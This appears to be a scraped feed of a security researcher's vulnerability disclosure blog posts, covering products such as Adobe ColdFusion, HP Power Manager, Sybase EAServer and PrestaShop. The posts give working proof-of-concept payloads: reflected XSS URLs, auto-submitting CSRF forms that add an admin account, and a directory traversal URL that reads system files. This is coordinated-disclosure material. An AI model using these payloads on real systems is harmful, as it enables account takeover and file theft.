<span style="font-family: Verdana, sans-serif;">Trend Micro Control Manager provides a convenient centralized security management console that is designed to minimize administrative complexity and work with Trend Micro solutions to maximize security.<br /><br />Sow Ching Shiong, an independent vulnerability researcher has discovered Cross-Site Scripting vulnerability in Trend Micro Control Manager. This issue was discovered in a default installation of Trend Micro Control Manager 5.5 Build 1250 (Hot Fix: 1350). Other earlier versions may also be affected.</span><br />
<br />
<b style="color: orange; font-family: Verdana, sans-serif;">Proof of concept</b><br />
<span style="font-family: Verdana, sans-serif;">https://</span><span style="font-family: Verdana, sans-serif;">[target]</span><span style="font-family: Verdana, sans-serif;">/commoncgi/servlet/CCGIServlet?ApHost=SLF_PRODUCT_TVCS"><script>alert(/XSS/)</script>&CGIAlias=SLF_PRODUCT_TVCS&Page=</span><br />
<span style="font-family: Verdana, sans-serif;"><br /><b><span style="color: orange;">Solution</span></b><br />Trend Micro has released patches which address this issue. Please see the references for more information.<br /><br /><b><span style="color: orange;">References</span></b></span><br />
<span style="font-family: Verdana, sans-serif;">Vendor URL: </span><a href="http://downloadcenter.trendmicro.com/index.php?prodid=7#fragment-1845" style="font-family: Verdana, sans-serif;" target="_blank">http://downloadcenter.trendmicro.com/index.php?prodid=7#fragment-1845</a><br />
<span style="font-family: Verdana, sans-serif;">Secunia: </span><a href="http://secunia.com/advisories/44134/" style="font-family: Verdana, sans-serif;" target="_blank">http://secunia.com/advisories/44134/</a><br />
<br />
<span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Disclosure Timeline</span></b><br />2011-04-09 - Vulnerability discovered.<br />2011-04-09 - Vulnerability reported to Secunia.<br />2011-04-28 - Secunia confirmed the vulnerability and contacted the vendor.<br />2011-06-15 - Patch released.<br />2011-06-16 - Advisory published by Secunia.</span><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/qVi6IZUzE2A" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com0http://chingshiong.blogspot.com/2012/04/trend-micro-control-manager-cross-site.htmltag:blogger.com,1999:blog-566969067083138258.post-58875080007337067632012-04-25T17:12:00.000+08:002012-05-11T14:48:18.963+08:002012-05-11T14:48:18.963+08:00Adobe ColdFusion 9.0.1.274733 Cross-Site Request Forgery (CSRF) Vulnerability<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Description</span></b><br />
<span style="font-family: Verdana, sans-serif;">Adobe ColdFusion application server enables developers to rapidly build, deploy, and maintain robust Internet applications for the enterprise.<br /><br />Sow Ching Shiong, an independent vulnerability researcher has discovered Cross-Site Request Forgery vulnerability in Adobe ColdFusion. This issue was discovered in a default installation of Adobe ColdFusion 9.0.1.274733. Other earlier versions may also be affected.</span><br />
<br />
<b style="color: orange; font-family: Verdana, sans-serif;">Proof of concept</b><br />
<span style="font-family: Verdana, sans-serif;"><html></span><br />
<div style="font-family: Verdana, sans-serif;">
<body></div>
<div style="font-family: Verdana, sans-serif;">
<form action="http://[target]:8500/CFIDE/administrator/security/useredit.cfm" id="csrf" method="post"></div>
<div style="font-family: Verdana, sans-serif;">
<input type="hidden" name="uname" value="attacker" /></div>
<div style="font-family: Verdana, sans-serif;">
<input type="hidden" name="password1" value="passwd123" /></div>
<div style="font-family: Verdana, sans-serif;">
<input type="hidden" name="password2" value="passwd123" /></div>
<div style="font-family: Verdana, sans-serif;">
<input type="hidden" name="Description" value="" /></div>
<div style="font-family: Verdana, sans-serif;">
<input type="hidden" name="userallowrds" value="true" /></div>
<div style="font-family: Verdana, sans-serif;">
<input type="hidden" name="userallowadministrative" value="true" /></div>
<div style="font-family: Verdana, sans-serif;">
<input type="hidden" name="userallow" value="adminapi" /></div>
<div style="font-family: Verdana, sans-serif;">
<input type="hidden" name="grantedRoles" value="coldfusion.collections,coldfusion.datasources,coldfusion.flexdataservices,coldfusion.migrateveritycollections,coldfusion.solrserver,coldfusion.verityk2server,coldfusion.webservices,coldfusion.codeanalyzer,coldfusion.debugging,coldfusion.licensescanner,coldfusion.logging,coldfusion.scheduledtasks,coldfusion.systemprobes,coldfusion.enterprisemanager,coldfusion.eventgateways,coldfusion.cfxtags,coldfusion.corbaconnectors,coldfusion.customtagpaths,coldfusion.applets,coldfusion.packagingdeployment,coldfusion.sandboxsecurity,coldfusion.monitoring,coldfusion.serversettings,coldfusion.serversettingssummary" /></div>
<div style="font-family: Verdana, sans-serif;">
<input type="hidden" name="grantedSandboxes" value="C:\ColdFusion9\wwwroot\CFIDE\,C:\ColdFusion9\wwwroot\WEB-INF\" /></div>
<div style="font-family: Verdana, sans-serif;">
<input type="hidden" name="grantedServices" value="mail,document,pdf,image,chart,pop,upload" /></div>
<div style="font-family: Verdana, sans-serif;">
<input type="hidden" name="adminaction" value="add" /></div>
<div style="font-family: Verdana, sans-serif;">
</form></div>
<div style="font-family: Verdana, sans-serif;">
<script></div>
<div style="font-family: Verdana, sans-serif;">
document.getElementById('csrf').submit();</div>
<div style="font-family: Verdana, sans-serif;">
</script></div>
<div style="font-family: Verdana, sans-serif;">
</body></div>
<div style="font-family: Verdana, sans-serif;">
</html></div>
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><br /><b><span style="color: orange;">Solution</span></b><br />Adobe has released patches which address this issue. Please see the references for more information.<br /><br /><b><span style="color: orange;">References</span></b></span></span><br />
<span style="font-family: Verdana, sans-serif;">Vendor URL: </span><a href="http://www.adobe.com/support/security/bulletins/apsb11-14.html" style="font-family: Verdana, sans-serif;" target="_blank">http://www.adobe.com/support/security/bulletins/apsb11-14.html</a><br />
<span style="font-family: Verdana, sans-serif;">Secunia: </span><a href="http://secunia.com/advisories/43013/" style="font-family: Verdana, sans-serif;" target="_blank">http://secunia.com/advisories/43013/</a><br />
<br />
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Disclosure Timeline</span></b><br />2011-01-21 - Vulnerability discovered.<br />2011-01-21 - Vulnerability reported to Secunia.<br />2011-01-21 - Secunia confirmed the vulnerability and contacted the vendor.<br />2011-06-14 - Patch released.<br />2011-06-15 - Advisory published by Secunia.</span></span><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/Sxtj19irAA8" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com0http://chingshiong.blogspot.com/2012/04/adobe-coldfusion-901274733-cross-site.htmltag:blogger.com,1999:blog-566969067083138258.post-45120988563848597702012-04-25T16:19:00.000+08:002012-05-11T14:48:39.464+08:002012-05-11T14:48:39.464+08:00Sybase EAServer 6.3.1 Directory Traversal Vulnerability<span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Description</span></b><br />
Sybase EAServer is the leading solution for distributed and Web-enabled PowerBuilder applications. EA Server can be used to run multiple websites, portals or Web applications. It allows access from Web browsers and provides a development platform for enterprise Web services.<br />
<br />
Sow Ching Shiong, an independent vulnerability researcher has identified a Directory Traversal vulnerability in Sybase EAServer. This issue was discovered in a default installation of Sybase EAServer 6.3.1 Developer Edition running on Windows 2003 Server. Other earlier versions may also be affected.<br />
<span style="color: orange;"><b><br /></b></span>
<span style="color: orange;"><b>Proof of concept</b></span><br />
http://[target]:8000/images//.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\boot.ini</span><br />
<br />
<a href="http://4.bp.blogspot.com/-OgIdqt4RySI/T5e1vhsYkGI/AAAAAAAAAEU/Zk4_24mu3-w/s1600/Sybase-EA-Server-Dir-Traversal-01.png"><img border="0" src="http://4.bp.blogspot.com/-OgIdqt4RySI/T5e1vhsYkGI/AAAAAAAAAEU/Zk4_24mu3-w/s400/Sybase-EA-Server-Dir-Traversal-01.png" /></a>
<span style="font-family: Verdana, sans-serif;"><br />
<br />
<b><span style="color: orange;">Solution</span></b><br />
Sybase has released patches which address this issue. Please see the references for more information.<br />
<br />
<b><span style="color: orange;">References</span></b><br />
Vendor URL: <a href="http://www.sybase.com/detail?id=1093216" target="_blank">http://www.sybase.com/detail?id=1093216</a><br />
iDefense: <a href="http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=912" target="_blank">http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=912</a><br />
Secunia: <a href="http://secunia.com/advisories/44666/" target="_blank">http://secunia.com/advisories/44666/</a><br />
<br />
<b><span style="color: orange;">Disclosure Timeline</span></b><br />
2011-01-25 - Vulnerability discovered.<br />
2011-01-25 - Vulnerability reported to iDefense.<br />
2011-03-29 - iDefense confirmed the vulnerability and contacted the vendor.<br />
2011-05-23 - Patch released.<br />
2011-05-25 - Advisory published by iDefense.</span><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/4Qg997_vAeI" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com0http://chingshiong.blogspot.com/2012/04/sybase-easerver-631-directory-traversal.htmltag:blogger.com,1999:blog-566969067083138258.post-7432550232326176782012-04-19T23:11:00.001+08:002012-05-11T14:48:57.764+08:002012-05-11T14:48:57.764+08:00F-Secure Policy Manager Web Reporting 9.00.30231 Path Disclosure and Cross-Site Scripting (XSS) Vulnerability<span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Description</span></b></span><br />
<span style="font-family: Verdana, sans-serif;">F-Secure Policy Manager Web Reporting allow administrators to identify computers that are unprotected or vulnerable to virus outbreaks before they actually occur.</span><br />
<span style="font-family: Verdana, sans-serif;"><br />
Sow Ching Shiong, an independent vulnerability researcher has identified a Path Disclosure and Cross-Site Scripting vulnerability in F-Secure Policy Manager Web Reporting. This issue was discovered in a default installation of F-Secure Policy Manager Web Reporting 9.00.30231. Other earlier versions may also be affected.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /><span style="color: orange;"><b>Proof of concept</b></span></span><br />
<span style="font-family: Verdana, sans-serif;">Path Disclosure<br />
============<br />http://[target]:8081/report/infection-table.html</span><br />
<span style="font-family: Verdana, sans-serif;"><br /><a href="http://1.bp.blogspot.com/-N9eacdcNK9w/T5AlL8h14CI/AAAAAAAAAD8/SYcTV-U6do8/s1600/FS_Policy_Manager_Path_Disclosure_01.PNG"><img border="0" src="http://1.bp.blogspot.com/-N9eacdcNK9w/T5AlL8h14CI/AAAAAAAAAD8/SYcTV-U6do8/s400/FS_Policy_Manager_Path_Disclosure_01.PNG" /></a></span><br />
<br />
<span style="font-family: Verdana, sans-serif;">Cross-Site Scripting (XSS)<br />====================<br />http://[target]:8081/'"--></style></script><script>alert(1)</script></span><br />
<span style="font-family: Verdana, sans-serif;"><br /><a href="http://1.bp.blogspot.com/-rw_E8rne6Sg/T5AlouTKEJI/AAAAAAAAAEE/y6-uCzBQMG8/s1600/FS_Policy_Manager_XSS_01.PNG"><img border="0" src="http://1.bp.blogspot.com/-rw_E8rne6Sg/T5AlouTKEJI/AAAAAAAAAEE/y6-uCzBQMG8/s400/FS_Policy_Manager_XSS_01.PNG" /></a><b><span style="color: orange;"><br /></span></b></span><br />
<span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Solution</span></b></span><br />
<span style="font-family: Verdana, sans-serif;">F-Secure recommends that administrators of the affected systems patch or upgrade their systems.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /><b><span style="color: orange;">References</span></b></span><br />
<span style="font-family: Verdana, sans-serif;">Vendor URL: </span><a href="http://www.f-secure.com/en/web/labs_global/fsc-2011-2" style="font-family: Verdana, sans-serif;" target="_blank">http://www.f-secure.com/en/web/labs_global/fsc-2011-2</a>
<br />
<span style="font-family: Verdana, sans-serif;">Secunia: <a href="http://secunia.com/advisories/43049/" target="_blank">http://secunia.com/advisories/43049/</a></span><br />
<br />
<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Disclosure Timeline</span></b><br />
<span style="font-family: Verdana, sans-serif;">2011-01-17 - Vulnerability discovered.<br />2011-01-17 - Vulnerability reported to Secunia.<br />2010-01-25 - Secunia confirmed the vulnerability and contacted the vendor.<br />2011-02-24 - Patch released.<br />2011-02-24 - Advisory published by Secunia.</span><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/TclOFoDDIMQ" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com0http://chingshiong.blogspot.com/2012/04/f-secure-policy-manager-web-reporting.htmltag:blogger.com,1999:blog-566969067083138258.post-74725605408758693712012-04-19T20:52:00.000+08:002012-05-11T14:49:18.382+08:002012-05-11T14:49:18.382+08:00HP Power Manager 4.3.2 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Description</span></b><br />
<span style="font-family: Verdana, sans-serif;">HP Power Manager (HPPM) is a web-based application that enables administrators to manage an HP UPS from a browser-based management console. Administrators can monitor, manage, and control a single UPS locally and remotely.<br />
<br />
Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in HP Power Manager. These issues were discovered in a default installation of HP Power Manager 4.3.2. Other earlier versions may also be affected.</span><br />
<br />
<b style="color: orange; font-family: Verdana, sans-serif;">Proof of concept</b><br />
<span style="font-family: Verdana, sans-serif;">
Cross-Site Request Forgery (CSRF)<br />
==========================<br />
<span style="font-family: Verdana, sans-serif;"><html></span><br />
<span style="font-family: Verdana, sans-serif;"><body></span><br />
<span style="font-family: Verdana, sans-serif;"><form action="http://[target]/goform/formSetUsers" id="csrf" method="post"></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="name9" value="attacker" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="pass9" value="passwd123" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="rpass9" value="passwd123" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="admin9" value="on" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="actionType" value="1" /></span><br />
<span style="font-family: Verdana, sans-serif;"></form></span><br />
<span style="font-family: Verdana, sans-serif;"><script></span><br />
<span style="font-family: Verdana, sans-serif;">document.getElementById('csrf').submit();</span><br />
<span style="font-family: Verdana, sans-serif;"></script></span><br />
<span style="font-family: Verdana, sans-serif;"></body></span><br />
<span style="font-family: Verdana, sans-serif;"></html></span><br />
<span style="font-family: Verdana, sans-serif;"> <br />
Cross-Site Scripting (XSS)<br />
====================</span></span><br />
<ul>
<li><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">http://[target]/contents/exportlogs.asp?logType=Application%253cscript%2b%253ealert%25281%2529%253b%253c%252fscript%2b%253e</span></span></li>
<li><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">http://[target]/contents/applicationlogs.asp?SORTCOL=2&SORTORD=2"%20onMouseOver%3dalert%281%29%2f%2f&TIME=0&PAGE=1&ITEMSPERPAGE=20</span></span></li>
<li><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">http://[target]/contents/applicationlogs.asp?SORTCOL=2"%20onMouseOver%3dalert%281%29%2f%2f&SORTORD=2&TIME=0&PAGE=1&ITEMSPERPAGE=20</span></span></li>
<li><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">http://[target]/contents/pagehelp.asp?Id=About%253cscript%2b%253ealert%25281%2529%253b%253c%252fscript%2b%253e</span></span></li>
</ul>
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">
<br />
<b><span style="color: orange;">Solution</span></b><br />
HP recommends the following:</span></span><br />
<ul><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">
<li>Open a browser instance, log on to HPPM, perform needed task, and log off from HPPM.</li>
<li>Do not visit untrusted web sites while logged on to HPPM.</li>
<li>Use a firewall to limit access to HPPM.</li>
</span></span></ul>
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">
<br />
<b><span style="color: orange;">References</span></b></span></span><br />
<span style="font-family: Verdana, sans-serif;">Vendor URL: </span><a href="http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02711131" style="font-family: Verdana, sans-serif;" target="_blank">http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02711131</a><br />
<span style="font-family: Verdana, sans-serif;">Secunia: </span><a href="http://secunia.com/advisories/43058/" style="font-family: Verdana, sans-serif;" target="_blank">http://secunia.com/advisories/43058/</a><br />
<br />
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Disclosure Timeline</span></b><br />
2011-01-25 - CSRF Vulnerability discovered.<br />
2011-01-25 - CSRF Vulnerability reported to Secunia.<br />
2011-01-26 - Secunia confirmed the vulnerability and contacted the vendor.<br />
2011-02-07 - HP released recommendation for CSRF.<br />
2011-02-08 - Advisory published by Secunia.<br />
2011-02-10 - XSS Vulnerability discovered.<br />
2011-02-10 - XSS Vulnerability reported to Secunia.<br />
2011-02-10 - Secunia confirmed the vulnerability and contacted the vendor.<br />
2011-03-09 - </span><span style="font-family: Verdana, sans-serif;">HP released recommendation for XSS.</span> <span style="font-family: Verdana, sans-serif;"><br />
2011-03-10 - Advisory updated by Secunia.</span></span><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/kBx3vZAosiI" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com0http://chingshiong.blogspot.com/2012/04/hp-power-manager-cross-site-request.htmltag:blogger.com,1999:blog-566969067083138258.post-73682429840228993962012-04-19T11:48:00.001+08:002012-05-01T23:51:24.976+08:002012-05-01T23:51:24.976+08:00PrestaShop 1.3.3 Cross-Site Scripting (XSS) Vulnerability<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Description</span></b><br />
<span style="font-family: Verdana, sans-serif;">PrestaShop is an e-commerce solution which is free and open source. It supports payment gateways such as Google Checkout, Authorize.net, Skrill, PayPal and Payments Pro via API. Further payment modules are offered commercially.<br />
<br />
Sow Ching Shiong, an independent vulnerability researcher has identified a Cross-Site Scripting vulnerability in PrestaShop. This issue was discovered in a default installation of PrestaShop 1.3.3. Other earlier versions may also be affected.</span><br />
<br />
<b style="color: orange; font-family: Verdana, sans-serif;">Proof of concept</b><br />
<span style="font-family: Verdana, sans-serif;">
http://[target]/[path]/search.php?'"--></style></script><script>alert(1)</script><br />
<br />
<a href="http://3.bp.blogspot.com/-fFIPIBr80Ps/T4-I-VZCZgI/AAAAAAAAAD0/MK1kk6tBNQ0/s1600/xss-prestashop_v1.3.3.0.JPG"><img border="0" src="http://3.bp.blogspot.com/-fFIPIBr80Ps/T4-I-VZCZgI/AAAAAAAAAD0/MK1kk6tBNQ0/s320/xss-prestashop_v1.3.3.0.JPG" /></a><br />
<br />
<b><span style="color: orange;">Solution</span></b><br />
Update to version 1.3.4 or later.<br />
<br />
<b><span style="color: orange;">References</span></b></span><br />
<span style="font-family: Verdana, sans-serif;">Vendor URL: </span><a href="http://www.prestashop.com/en/developers-versions/changelog/1.3.4.0" style="font-family: Verdana, sans-serif;" target="_blank">http://www.prestashop.com/en/developers-versions/changelog/1.3.4.0</a><br />
<span style="font-family: Verdana, sans-serif;">Secunia: </span><a href="http://secunia.com/advisories/42503/" style="font-family: Verdana, sans-serif;" target="_blank">http://secunia.com/advisories/42503/</a><br />
<span style="font-family: Verdana, sans-serif;">
<br />
<b><span style="color: orange;">Disclosure Timeline</span></b><br />
2010-12-06 - Vulnerability discovered.<br />
2010-12-06 - Vulnerability reported to Secunia.<br />
2010-12-10 - Secunia confirmed the vulnerability and contacted the vendor.<br />
2010-12-22 - Patch released.<br />
2010-12-22 - Advisory published by Secunia.</span><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/NELBCB1mn-A" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com1http://chingshiong.blogspot.com/2012/04/prestashop-cross-site-scripting.htmltag:blogger.com,1999:blog-566969067083138258.post-16345443452164482832012-04-19T11:15:00.002+08:002012-04-29T16:27:57.993+08:002012-04-29T16:27:57.993+08:00CompleteFTP Server 4.0.2 Directory Traversal Vulnerability<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Description</span></b><span style="font-family: Verdana, sans-serif;"><span style="color: orange;"><b><br /></b></span>
CompleteFTP Server is a high-performance Windows FTP server supporting FTP, FTPS, SFTP and SCP. It features both Windows and non-Windows users and a fully configurable virtual file-system.<br />
<br />
Sow Ching Shiong, an independent vulnerability researcher has identified a Directory Traversal vulnerability in CompleteFTP Server. This issue was discovered in a default installation of CompleteFTP Server 4.0.2. Other earlier versions may also be affected.<br />
<br /><span style="color: orange;"><b></b></span>
<span style="color: orange;"><b>Proof of concept</b></span><br /><br />
<a href="http://4.bp.blogspot.com/-hWQFAYGWCmg/T4-Be6zFG9I/AAAAAAAAADk/AcVGobH334A/s1600/CompleteFTP-01.jpg"><img border="0" src="http://4.bp.blogspot.com/-hWQFAYGWCmg/T4-Be6zFG9I/AAAAAAAAADk/AcVGobH334A/s320/CompleteFTP-01.jpg" /></a><br />
<br />
<a href="http://2.bp.blogspot.com/-CbkNkdYvcZw/T4-BiPYSQCI/AAAAAAAAADs/gvi1zkhOhP4/s1600/CompleteFTP-02.jpg"><img border="0" src="http://2.bp.blogspot.com/-CbkNkdYvcZw/T4-BiPYSQCI/AAAAAAAAADs/gvi1zkhOhP4/s320/CompleteFTP-02.jpg" /></a><br />
<br />
<b><span style="color: orange;">Solution</span></b><br />
Update to version 4.0.3 or later.<br />
<br />
<b><span style="color: orange;">References</span></b></span><br />
<span style="font-family: Verdana, sans-serif;">Vendor URL: </span><a href="http://www.enterprisedt.com/products/completeftp/history.html" style="font-family: Verdana, sans-serif;" target="_blank">http://www.enterprisedt.com/products/completeftp/history.html</a><br />
<span style="font-family: Verdana, sans-serif;">Secunia: </span><a href="http://secunia.com/advisories/39852/" style="font-family: Verdana, sans-serif;" target="_blank">http://secunia.com/advisories/39852/</a><br />
<span style="font-family: Verdana, sans-serif;">
<br />
<b><span style="color: orange;">Disclosure Timeline</span></b><br />
2010-05-18 - Vulnerability discovered.<br />
2010-05-18 - Vulnerability reported to Secunia.<br />
2010-05-19 - Secunia confirmed the vulnerability and contacted the vendor.<br />
2010-06-02 - Patch released.<br />
2010-06-02 - Advisory published by Secunia.</span><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/aU8MGM_1XBs" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com0http://chingshiong.blogspot.com/2012/04/completeftp-server-402-directory.htmltag:blogger.com,1999:blog-566969067083138258.post-16210830105036524602012-04-18T17:20:00.006+08:002012-04-29T16:28:10.352+08:002012-04-29T16:28:10.352+08:00SnugServer FTP Server 4.3.0.126 Directory Traversal Vulnerability<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Description</span></b><span style="font-family: Verdana, sans-serif;"><span style="color: orange;"><b><br /></b></span>
SnugServer is an Email Server, Web Server, FTP Server, NewsServer and ListServer. It's your all-in-one solution to managing your Internet Presence. Send/receive emails through your own server, host your own website(s) and so much more.<br />
<br />
Sow Ching Shiong, an independent vulnerability researcher has identified a Directory Traversal vulnerability in SnugServer FTP Server. This issue was discovered in a default installation of SnugServer FTP Server 4.3.0.126. Other earlier versions may also be affected.<br />
<span style="color: orange;"><b><br /></b></span>
<span style="color: orange;"><b>Proof of concept</b></span><br /><br />
<a href="http://3.bp.blogspot.com/-ZsGOY0_uoSE/T46D9D7x83I/AAAAAAAAADc/HhTsQAysiYY/s1600/PoC.jpg"><img border="0" src="http://3.bp.blogspot.com/-ZsGOY0_uoSE/T46D9D7x83I/AAAAAAAAADc/HhTsQAysiYY/s400/PoC.jpg" /></a><br />
<br />
<b><span style="color: orange;">Solution</span></b><br />
Update to version 4.3.0.134 or later.<br />
<br />
<b><span style="color: orange;">Reference</span></b><br />
Secunia: <a href="http://secunia.com/advisories/39866/" target="_blank">http://secunia.com/advisories/39866/</a><br />
<br />
<b><span style="color: orange;">Disclosure Timeline</span></b><br />
2010-05-20 - Vulnerability discovered.<br />
2010-05-20 - Vulnerability reported to Secunia.<br />
2010-05-20 - Secunia confirmed the vulnerability and contacted the vendor.<br />
2010-05-21 - Patch released.<br />
2010-05-21 - Advisory published by Secunia.</span><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/bN8zph7BGkc" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com0http://chingshiong.blogspot.com/2012/04/snugserver-ftp-server-430126-directory.html